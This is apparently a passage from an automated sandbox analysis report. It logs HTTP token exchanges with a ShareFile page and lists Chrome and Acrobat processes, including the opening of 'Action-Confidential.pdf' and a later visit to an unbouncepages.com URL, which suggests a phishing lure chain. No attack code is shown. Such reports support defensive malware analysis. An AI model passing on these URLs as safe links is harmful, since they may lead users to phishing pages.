                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC1956OUTData Raw: 7b 22 65 78 69 73 74 69 6e 67 5f 74 6f 6b 65 6e 22 3a 22 65 39 36 61 32 61 31 36 2d 37 65 33 63 2d 34 62 39 39 2d 39 36 65 32 2d 66 34 35 61 62 37 36 62 32 38 38 35 3a 45 51 6f 41 6a 63 31 2b 71 74 4a 70 41 41 41 41 3a 70 46 62 33 6c 46 6c 61 59 76 41 2b 58 59 4e 4f 7a 69 45 76 66 70 6c 76 2f 54 39 74 6d 57 47 62 5a 58 57 4b 6d 54 68 31 5a 41 30 71 58 79 34 4f 75 68 4e 39 31 71 2f 41 34 65 6c 37 41 6e 74 77 57 49 73 6e 59 47 39 79 2b 76 64 43 6e 4e 6d 6f 4a 44 55 73 43 37 56 6d 52 44 76 4d 62 54 63 61 49 6f 38 41 4a 38 79 54 31 48 76 41 4a 77 74 57 4b 34 33 57 47 54 73 46 64 2f 69 35 7a 6b 50 6b 7a 4f 54 62 2f 53 49 33 48 2b 35 4a 55 36 5a 63 74 4b 71 54 45 38 6b 53 46 39 58 38 37 51 77 51 46 44 63 5a 63 63 4e 73 59 76 55 47 33 36 7a 75 2f 54 4d 65 79 4a
                                                                                                                                                                                                                                                                                Data Ascii: {"existing_token":"e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAjc1+qtJpAAAA:pFb3lFlaYvA+XYNOziEvfplv/T9tmWGbZXWKmTh1ZA0qXy4OuhN91q/A4el7AntwWIsnYG9y+vdCnNmoJDUsC7VmRDvMbTcaIo8AJ8yT1HvAJwtWK43WGTsFd/i5zkPkzOTb/SI3H+5JU6ZctKqTE8kSF9X87QwQFDcZccNsYvUG36zu/TMeyJ
                                                                                                                                                                                                                                                                                2024-10-09 18:05:25 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                Content-Length: 940
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:25 GMT
                                                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS,GET,POST
                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                expires: 0
                                                                                                                                                                                                                                                                                x-amzn-waf-challenge-id: Root=1-6706c5e4-51deb4ac43c7bc7c0c2f6b22
                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 daf01c71790f42e645ae4024c607941e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P12
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 2aUvjZMKhYlPP3ZiYsFYgMmXctCJgvGaSEw7EHLecOhVF0Z6PcLrwQ==
                                                                                                                                                                                                                                                                                2024-10-09 18:05:25 UTC940INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 65 39 36 61 32 61 31 36 2d 37 65 33 63 2d 34 62 39 39 2d 39 36 65 32 2d 66 34 35 61 62 37 36 62 32 38 38 35 3a 45 51 6f 41 74 72 52 2b 43 62 63 42 41 51 41 41 3a 47 6b 61 53 71 69 70 4a 6d 65 33 36 62 51 31 2f 71 2b 48 6c 33 61 46 48 38 42 51 7a 6f 6a 4f 72 73 4c 33 48 32 4e 50 76 4b 45 6f 6c 47 68 4c 39 56 67 55 48 56 79 70 49 53 66 34 70 66 4a 73 4f 4e 2b 78 58 43 7a 4a 44 75 53 36 6e 6c 7a 57 63 76 4c 50 30 55 48 5a 6c 30 4f 76 72 63 6f 6e 35 32 57 61 59 4d 6a 62 6c 6a 71 2b 72 69 63 41 41 38 6a 6c 73 4f 31 76 4f 6e 69 58 69 63 64 4a 43 2b 31 69 6c 33 58 48 4e 77 39 2f 72 4a 45 69 43 6e 37 72 63 57 67 46 39 66 72 38 42 2b 75 59 59 35 66 41 61 43 6d 4e 78 61 65 56 45 70 54 53 58 4d 72 7a 6f 71 4c 63 56 70 6a 48 6b 39 52 5a
                                                                                                                                                                                                                                                                                Data Ascii: {"token":"e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAtrR+CbcBAQAA:GkaSqipJme36bQ1/q+Hl3aFH8BQzojOrsL3H2NPvKEolGhL9VgUHVypISf4pfJsON+xXCzJDuS6nlzWcvLP0UHZl0Ovrcon52WaYMjbljq+ricAA8jlsO1vOniXicdJC+1il3XHNw9/rJEiCn7rcWgF9fr8B+uYY5fAaCmNxaeVEpTSXMrzoqLcVpjHk9RZ


                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                Start time:14:04:56
                                                                                                                                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                Start time:14:05:01
                                                                                                                                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2252,i,4924917487145762283,2033934447409194097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                                Start time:14:05:03
                                                                                                                                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://premierbb.sharefile.com/public/share/web-189361297164461c"
                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                                Start time:14:06:20
                                                                                                                                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Action-Confidential.pdf"
                                                                                                                                                                                                                                                                                Imagebase:0x7ff651090000
                                                                                                                                                                                                                                                                                File size:5'641'176 bytes
                                                                                                                                                                                                                                                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                                Start time:14:06:21
                                                                                                                                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                                                                                                                                                                                Imagebase:0x7ff70df30000
                                                                                                                                                                                                                                                                                File size:3'581'912 bytes
                                                                                                                                                                                                                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                                                Start time:14:06:21
                                                                                                                                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2056 --field-trial-handle=1632,i,2415105294210288896,4145336450778685438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                                                                                                                                                                                Imagebase:0x7ff70df30000
                                                                                                                                                                                                                                                                                File size:3'581'912 bytes
                                                                                                                                                                                                                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                                                Start time:14:06:46
                                                                                                                                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "http://unbouncepages.com/99392004001023/"
                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                                                Start time:14:06:47
                                                                                                                                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1980,i,1674931386176375637,9340985270672291635,262144 /prefetch:8
                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                No disassembly